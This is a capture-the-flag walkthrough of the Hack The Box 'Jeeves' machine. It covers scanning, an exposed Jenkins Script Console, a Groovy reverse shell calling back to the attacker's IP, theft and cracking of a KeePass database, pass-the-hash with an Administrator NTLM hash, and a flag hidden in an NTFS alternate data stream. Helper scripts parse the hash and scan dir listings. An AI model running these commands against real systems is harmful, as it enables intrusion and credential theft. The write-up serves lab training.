Hack The Box Jeeves Writeup
STEP 1: nmap scan
danger@V2Geeks:~/Dropbox/00/hTB/jeeves$ nmap -sC -sV -oA initial 10.10.10.63
# Nmap 7.70 scan initiated Thu May 24 18:01:53 2018 as: nmap -sC -sV -oA initial 10.10.10.63
Nmap scan report for 10.10.10.63
Host is up (0.18s latency).
Not shown: 996 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Ask Jeeves
135/tcp open msrpc Microsoft Windows RPC
445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP)
50000/tcp open http Jetty 9.4.z-SNAPSHOT
|_http-server-header: Jetty(9.4.z-SNAPSHOT)
|_http-title: Error 404 Not Found
Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 5h00m00s, deviation: 0s, median: 4h59m59s
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2018-05-24 23:02:50
|_ start_date: 2018-05-24 22:19:54
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu May 24 18:03:28 2018 -- 1 IP address (1 host up) scanned in 95.24 seconds
STEP 2: Browse to http://10.10.10.63 (port 80), the "Ask Jeeves" page that nmap reported.
STEP 3: Browse to http://10.10.10.63:50000 (port 50000). Jetty answers with a 404 at the root, so the content has to be found by brute-forcing directories.
STEP 4: gobuster on port 80
danger@V2Geeks:~$ gobuster -u http://10.10.10.63 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 15 -o 80.txt
Explanation: brute-force directories under the web root with the dirbuster medium wordlist and 15 threads.
STEP 5: gobuster on port 50000
danger@V2Geeks:~$ gobuster -u http://10.10.10.63:50000 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 15 -o 50000.txt
STEP 6: Important directory found
/askjeeves (Status: 302)
Let's try http://10.10.10.63:50000/askjeeves/
It shows the Jenkins dashboard.
STEP 7: Jenkins Script Console
Go to Dashboard -> Manage Jenkins -> Script Console.
Explanation: the page itself states that Groovy scripts can be written and run here, so anyone who can reach this console runs commands as the Jenkins service account.
STEP 8: Print a Hello World message in Groovy
cmd = " cmd.exe /c echo ''Hello World'' "
println cmd.execute().text
STEP 9: Getting an initial shell
Start a netcat listener on port 8044:
danger@V2Geeks:~/Dropbox/00/hTB/jeeves/www$ nc -nlvp 8044
listening on [any] 8044 ...
Paste the following into the Script Console:
String host="10.10.14.191";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
Click Run. The listener receives the connection:
10.10.10.63: inverse host lookup failed: Unknown host
connect to [10.10.14.191] from (UNKNOWN) [10.10.10.63] 49700
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Users\Administrator\.jenkins>
C:\Users\Administrator\.jenkins>whoami
whoami
jeeves\kohsuke
C:\Users\Administrator\.jenkins>cd c:/users/kohsuke/Desktop
c:\Users\kohsuke\Desktop>dir
dir
Directory of c:\Users\kohsuke\Desktop
11/03/2017 11:19 PM <DIR> .
11/03/2017 11:19 PM <DIR> ..
11/03/2017 11:22 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 7,269,990,400 bytes free
c:\Users\kohsuke\Desktop>type users.txt
type users.txt
The system cannot find the file specified.
c:\Users\kohsuke\Desktop>type user.txt
type user.txt
-----96fb------47950d59c4----
c:\Users\kohsuke\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of c:\Users\kohsuke\Documents
11/03/2017 11:18 PM <DIR> .
11/03/2017 11:18 PM <DIR> ..
09/18/2017 01:43 PM 2,846 CEH.kdbx
1 File(s) 2,846 bytes
2 Dir(s) 7,269,990,400 bytes free
To download CEH.kdbx, first upload nc.exe to the Windows machine (the listing below shows it in place):
c:\Users\kohsuke\Documents>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of c:\Users\kohsuke\Documents
06/09/2018 09:14 PM <DIR> .
06/09/2018 09:14 PM <DIR> ..
09/18/2017 01:43 PM 2,846 CEH.kdbx
06/09/2018 09:15 PM 1,667,584 nc.exe
2 File(s) 1,670,430 bytes
2 Dir(s) 7,267,651,584 bytes free
Then transfer CEH.kdbx to the Linux machine with netcat; it arrives intact at the same 2,846 bytes:
danger@kali:~$ ls -la CEH.kdbx
-rw-r--r-- 1 danger danger 2846 Jun 9 16:40 CEH.kdbx
danger@kali:~$ apt search keepass
Sorting... Done
Full Text Search... Done
keepass2/kali-rolling 2.38+dfsg-1 all
Password manager
keepass2-doc/kali-rolling 2.38+dfsg-1 all
Password manager - Documentation
keepassx/kali-rolling 2.0.3-1 amd64
Cross Platform Password Manager
keepassxc/kali-rolling 2.3.1+dfsg.1-1 amd64
Cross Platform Password Manager
kpcli/kali-rolling 3.1-3 all
command line interface to KeePassX password manager databases
libfile-keepass-perl/kali-rolling 2.03-1 all
interface to KeePass V1 and V2 database files
danger@kali:~$ keepass2john CEH.kdbx
CEH:$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
Note: the leading "CEH:" label (the database name) must be removed before cracking. The final hash is:
$keepass$*2*6000*222*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
Write it to a blank file called CEHjohnable and crack it with John the Ripper and the rockyou wordlist:
danger@kali:~$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt CEHjohnable
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64 OpenSSL])
Press 'q' or Ctrl-C to abort, almost any other key for status
Wait for about 5 minutes.
moonshine1 (?)
1g 0:00:00:55 DONE (2018-06-09 17:55) 0.01789g/s 983.9p/s 983.9c/s 983.9C/s moonshine1
Use the "--show" option to display all of the cracked passwords reliably
Session completed
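The reason john gets through the hash at roughly 1,000 candidates per second is encoded in the hash line itself: the second numeric field is the number of AES-KDF transform rounds the database owner chose (6000 here), and that is the only cost factor standing between a wordlist and the master password. The parser below is an added example for this writeup, not code from the page or from the keepass2john / John the Ripper projects. It validates the field layout as I read it for a KDBX 2.x/3.x hash (version, transform rounds, data-start offset, master seed, transform seed, encryption IV, expected start bytes, first encrypted block) using the hash extracted above, and estimates how long exhausting a wordlist would take at the rate john reported; the wordlist size is an assumption, not a value from the page.

```python
"""Parse a keepass2john hash line and read off the KDF cost it encodes.

Added example for this writeup, not code from the page nor from the
keepass2john / John the Ripper projects. SAMPLE_HASH is the line the
writeup extracted from CEH.kdbx (with the "CEH:" label stripped). The
field layout below is my reading of the format for a KDBX 2.x/3.x hash.
"""
from dataclasses import dataclass

SAMPLE_HASH = (
    "$keepass$*2*6000*222*"
    "1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*"
    "3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*"
    "393c97beafd8a820db9142a6a94f03f6*"
    "b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*"
    "cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48"
)

# Byte lengths the five hex blobs must have for a KDBX 3.x (AES-KDF) header.
BLOB_LENGTHS = (32, 32, 16, 32, 32)


@dataclass
class KeePassHash:
    version: int
    transform_rounds: int      # AES-KDF iterations: the only tunable cost factor
    data_start_offset: int     # header length; 222 is typical for KDBX 3.x (my reading)
    master_seed: bytes
    transform_seed: bytes
    encryption_iv: bytes
    expected_start_bytes: bytes
    first_block: bytes


def parse_keepass_hash(line: str) -> KeePassHash:
    """Validate a '$keepass$*2*...' line; raise ValueError on any defect."""
    line = line.strip()
    # keepass2john prefixes the database name ("CEH:"); drop it if present.
    if not line.startswith("$keepass$") and ":$keepass$" in line:
        line = line.split(":", 1)[1]
    parts = line.split("*")
    if parts[0] != "$keepass$":
        raise ValueError("not a keepass2john hash line")
    if len(parts) != 9:
        raise ValueError(f"expected 9 '*'-separated fields, got {len(parts)}")
    if parts[1] != "2":
        raise ValueError(f"only version-2 hashes are handled here, got {parts[1]}")
    rounds = int(parts[2])
    offset = int(parts[3])
    if rounds <= 0:
        raise ValueError("transform rounds must be positive")
    blobs = []
    for hexstr, want in zip(parts[4:], BLOB_LENGTHS):
        try:
            blob = bytes.fromhex(hexstr)
        except ValueError as exc:
            raise ValueError(f"field is not hex: {hexstr[:16]}...") from exc
        if len(blob) != want:
            raise ValueError(f"expected {want}-byte field, got {len(blob)} bytes")
        blobs.append(blob)
    return KeePassHash(2, rounds, offset, *blobs)


def seconds_to_exhaust(wordlist_size: int, candidates_per_second: float) -> float:
    """Worst-case wall-clock time to try every wordlist entry at a measured rate."""
    if candidates_per_second <= 0:
        raise ValueError("rate must be positive")
    return wordlist_size / candidates_per_second


if __name__ == "__main__":
    h = parse_keepass_hash(SAMPLE_HASH)
    print(f"KDBX version {h.version}, {h.transform_rounds} AES-KDF rounds, "
          f"IV {h.encryption_iv.hex()}")
    # 983.9 c/s is the rate john reported in the writeup; 14.3 million lines
    # is the approximate size of rockyou.txt (assumption, not from the page).
    hours = seconds_to_exhaust(14_300_000, 983.9) / 3600
    print(f"Exhausting rockyou at that rate would take about {hours:.1f} hours")
```

The takeaway for the database owner is that the round count is theirs to set: the transform rounds live in the KDBX header (keepass2john simply copies them out), so a database with a few thousand rounds and a dictionary-word master password offers almost no resistance once the file is copied off the host.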
moonshine1 is the password for CEH.kdbx.
danger@kali:~$ apt-get install keepassx
danger@kali:~$ keepassx CEH.kdbx
Enter the password moonshine1 and click OK. The Administrator NTLM hash is found in the entry under "Backup stuff".
danger@kali:~$ pth-winexe --user=jeeves/administrator%aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00 --system //10.10.10.63 cmd.exe
E_md4hash wrapper called.
HASH PASS: Substituting user supplied NTLM HASH...
Microsoft Windows [Version 10.0.10586]
(c) 2015 Microsoft Corporation. All rights reserved.
C:\Windows\system32>
Move to the Administrator's Desktop and list its contents:
c:\Users\Administrator\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of c:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
12/24/2017 03:51 AM 36 hm.txt
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
2 File(s) 833 bytes
2 Dir(s) 7,267,586,048 bytes free
c:\Users\Administrator\Desktop>type hm.txt
type hm.txt
The flag is elsewhere. Look deeper.
c:\Users\Administrator\Desktop>dir /r /a:
dir /r /a:
Volume in drive C has no label.
Volume Serial Number is BE50-B1C9
Directory of c:\Users\Administrator\Desktop
11/08/2017 10:05 AM <DIR> .
11/08/2017 10:05 AM <DIR> ..
11/03/2017 10:03 PM 282 desktop.ini
12/24/2017 03:51 AM 36 hm.txt
34 hm.txt:root.txt:$DATA
11/08/2017 10:05 AM 797 Windows 10 Update Assistant.lnk
3 File(s) 1,115 bytes
2 Dir(s) 7,267,586,048 bytes free
c:\Users\Administrator\Desktop>more < hm.txt:root.txt
more < hm.txt:root.txt
----------------4b615a606----------c92----
Root flag found! It was hidden in the alternate data stream root.txt attached to hm.txt, the "hm.txt:root.txt:$DATA" entry that dir /r revealed.
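The flag only showed up because dir /r was used; a plain dir never lists alternate data streams, which is exactly why ADS is a favourite place to stash data on NTFS. The script below is an added example for this writeup, not code from the page: it scans the text of a dir /r listing and reports every named stream together with the file and directory it hangs off, so a collected listing can be triaged offline. SAMPLE_LISTING is a constructed copy of the Administrator Desktop listing above; the Zone.Identifier stream in the usage note is the benign download-origin marker Windows adds to files fetched from the internet, which you will usually want to filter out.

```python
"""Find alternate data streams (ADS) in the text of a Windows 'dir /r' listing.

Added example for this writeup, not code from the page. 'dir /r' prints each
named NTFS stream on its own line, with a size but no date, as
'<size> <file>:<stream>:$DATA', directly under the owning file; that is how
hm.txt:root.txt surfaced. SAMPLE_LISTING is a constructed copy of that
output so the script runs offline; feed it real 'dir /r' output on a host.
"""
import re
from typing import List, NamedTuple, Sequence


class StreamHit(NamedTuple):
    path: str     # directory from the last 'Directory of' header plus file name
    stream: str   # named stream, e.g. root.txt
    size: int     # bytes in the stream


SAMPLE_LISTING = """\
 Volume in drive C has no label.
 Volume Serial Number is BE50-B1C9

 Directory of c:\\Users\\Administrator\\Desktop

11/08/2017  10:05 AM    <DIR>          .
11/08/2017  10:05 AM    <DIR>          ..
11/03/2017  10:03 PM               282 desktop.ini
12/24/2017  03:51 AM                36 hm.txt
                                    34 hm.txt:root.txt:$DATA
11/08/2017  10:05 AM               797 Windows 10 Update Assistant.lnk
               3 File(s)          1,115 bytes
               2 Dir(s)   7,267,586,048 bytes free
"""

# ' Directory of <path>' headers say which folder the following lines belong to.
DIR_RE = re.compile(r"^\s*Directory of (?P<dir>.+?)\s*$")
# Stream lines: leading whitespace, a size, then 'name:stream:$DATA' and no date.
STREAM_RE = re.compile(
    r"^\s+(?P<size>[\d,]+)\s+(?P<file>[^:]+):(?P<stream>[^:]+):\$DATA\s*$"
)


def find_alternate_streams(listing: str, ignore: Sequence[str] = ()) -> List[StreamHit]:
    """Return every named stream in the listing, joined to its directory.

    Stream names listed in `ignore` (for example Zone.Identifier) are skipped.
    """
    hits: List[StreamHit] = []
    current_dir = ""
    for line in listing.splitlines():
        m = DIR_RE.match(line)
        if m:
            current_dir = m.group("dir")
            continue
        m = STREAM_RE.match(line)
        if not m or m.group("stream") in ignore:
            continue
        name = m.group("file").strip()
        path = f"{current_dir}\\{name}" if current_dir else name
        size = int(m.group("size").replace(",", ""))
        hits.append(StreamHit(path, m.group("stream"), size))
    return hits


if __name__ == "__main__":
    for hit in find_alternate_streams(SAMPLE_LISTING, ignore=("Zone.Identifier",)):
        print(f"{hit.path} has stream '{hit.stream}' of {hit.size} bytes")
```

On a live host the same information comes from PowerShell's Get-Item with -Stream * (for example Get-Item -Path hm.txt -Stream *), which lists every stream including the unnamed :$DATA one; the parser above is for the case where all you have is captured dir /r output from a session or a ticket.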